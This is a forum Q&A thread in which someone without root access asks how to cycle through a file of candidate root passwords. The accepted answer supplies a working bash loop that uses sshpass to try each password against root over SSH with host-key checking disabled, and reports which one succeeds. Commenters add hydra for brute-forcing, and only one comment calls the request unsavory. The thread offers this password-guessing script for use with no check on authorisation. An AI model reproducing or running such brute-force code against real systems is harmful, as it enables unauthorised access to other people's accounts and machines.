# Entering Password in su- through loop

Tags: bash, loops, ssh, root, su

The Scenario is like I have a list of root passwords.
But i don't want to keep trying  Manually.
So i wrote the shell script :

> for i in {1..26}
>
> do
>
> su - >>result
>
> done

and all my password are on a file **"attempt.txt".**

Now on Command Prompt i type the Command :

> **bash p2.sh < attempt.txt**

But It shows errors : "**Standard in must be a tty"**

So is there some way I can enter these passwords through some codes or commands without manually typing each Of those?
Please tell a command-line approach instead of some advanced utility software. I'm in it for learning.
Thanks :)

Comment: It's obvious that you aren't root

Comment: You can have a trick...you can test password by making ssh connection..Do want me to put wih ssh connection for you?

Comment: @MortezaLSC ..yes it would be great help

Comment: @hek2mgl Well I've mentioned that...i am not root but i have a couple of root passowrds in a file...one of them actually works...i want to find that one...as simple as that

Comment: I put the answer for you

Comment: If you got your answer you can tick it and accept it for other guys

Comment: This seems very unsavory...

Comment: use `SUDO_ASKPASS` with `sudo -A`...

Answer (score 2, accepted):

You can test the password by making ssh connection in loop:

```
#!/bin/bash

sshpass -f<filename> ssh -o 'StrictHostKeyChecking no' -p port user@ip
```

You should just install `sshpass` on your system

This surely works:

```
sshpass -p'password' ssh -o 'StrictHostKeyChecking no' -p 22  root@ip
```

**Try this one surely helps you:**

```
for pass in $(cat /path/to/pass)
do
   sshpass -p$pass ssh -o 'StrictHostKeyChecking no' -p 22  root@ip
done
```

## UPDATE

So if you want to get pretty output:

```
#!/bin/bash

for pass in $(cat /path/to/pass)
do
    echo -e "Reading $pass..."
    sshpass -p$pass ssh -o 'StrictHostKeyChecking no' -p 22  root@ip

    if [ "$?" -ne "0" ]; then
           echo -e "$pass is incorrect\n"
    elif [ "$?" -eq "0" ]; then 
           echo "SSH connection established with pass=$pass"
    fi
done
```

**You can also test your passwords with `hydra`**

Comment: You can tick the answer..under upvote downvote you can tick it

Comment: btw sshpass installation would require root permission... is there an alternate that requires no root privelages at all?

Comment: read http://askubuntu.com/questions/339/how-can-i-install-a-package-without-root-access

Comment: http://serverfault.com/questions/11270/installing-software-on-linux-without-root-privileges

Comment: Why don't you install `xhydra` on another machine and use it?install `hydra` and bruteforce password on your system

Comment: ohh ok, i'll try that ... actually i dont know much about ssh , that's why i asked...now i will learn ssh first and then try it. Thanks alot man :)

Comment: I really don't know there is a supid guy that downvote correct answers

Comment: +1... I didn't know there is `sshpass` command... I would normally try to rely on `SSH_ASKPASS`...

Comment: Thanks man..I do search for `SSH_ASKPASS` :)